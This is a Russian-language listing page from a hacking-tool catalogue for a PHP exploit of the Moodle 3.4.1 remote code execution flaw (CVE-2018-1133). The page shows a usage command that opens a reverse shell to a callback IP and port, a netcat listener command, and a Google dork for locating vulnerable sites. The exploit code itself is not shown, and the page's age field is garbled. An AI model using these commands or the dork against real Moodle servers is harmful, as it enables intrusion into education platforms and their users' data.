Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
MoodleExploit — Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133 | Kitploit
Инструменты/GitHubGitHub/darrynten/moodleexploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubdarrynten/moodleexploit

MoodleExploit

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

Репозиторий
1057 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Moodle Exploit

  • Название эксплойта: Эксплойт RCE в Moodle v3.4.1
  • Google Dork: inurl:"/course/jumpto.php?jump="
  • Дата: 15 марта 2019 года
  • Автор эксплойта: Darryn Ten
  • Домашняя страница производителя: https://moodle.org
  • Ссылка на ПО: https://github.com/moodle/moodle/archive/v3.4.1.zip
  • Версия: 3.4.1 (возможно < 3.5.0 и, возможно, даже 3.x)
  • Протестировано на: Linux с Moodle v3.4.1
  • CVE : CVE-2018-1133

Пользователь с ролью учителя может выполнять произвольный код.

Использование

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

root@kitploit:~
user       Имя пользователя учётной записи
pass       Пароль от учётной записи
ip         IP-адрес для обратного вызова
port       Порт для обратного вызова
course     Действительный ID курса, принадлежащий учителю

Убедитесь, что вы запустили прослушивание netcat на указанном порту перед выполнением этого скрипта.

nc -lnvp 1010

Это попытается открыть обратную оболочку (reverse shell) на указанные IP-адрес и порт.

Примечания

Этот эксплойт основан на информации, предоставленной Робином Пералье (Robin Peraglie).

Дополнительное чтение: https://blog.ripstech.com/2018/moodle-remote-code-execution

Скачать инструмент